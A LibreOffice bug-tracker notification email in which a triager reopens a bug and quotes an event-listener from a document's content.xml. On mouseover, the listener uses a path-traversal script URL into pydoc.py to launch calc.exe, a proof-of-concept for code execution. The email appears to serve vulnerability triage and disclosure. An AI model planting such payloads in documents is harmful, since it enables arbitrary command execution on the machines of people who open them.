https://bugs.documentfoundation.org/show_bug.cgi?id=120675

V Stuart Foote <vstuart.fo...@utsa.edu> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
          Component|Writer                      |sdk
         Resolution|INVALID                     |---
                 CC|                            |caol...@redhat.com
     Ever confirmed|0                           |1
             Status|RESOLVED                    |NEW

--- Comment #5 from V Stuart Foote <vstuart.fo...@utsa.edu> ---
So looking at the content.xml the script call is: "<script:event-listener
script:language="ooo:script" script:event-name="dom:mouseover"
xlink:href="vnd.sun.star.script:../../../program/python-core-3.5.5/lib/pydoc.py$tempfilepager(1,
calc.exe )?language=Python&amp;location=share" xlink:type="simple"/>"

So what is the issue, that python is calling a system executable? So security?

-- 
You are receiving this mail because:
You are the assignee for the bug.
_______________________________________________
Libreoffice-bugs mailing list
Libreoffice-bugs@lists.freedesktop.org
https://lists.freedesktop.org/mailman/listinfo/libreoffice-bugs

Reply via email to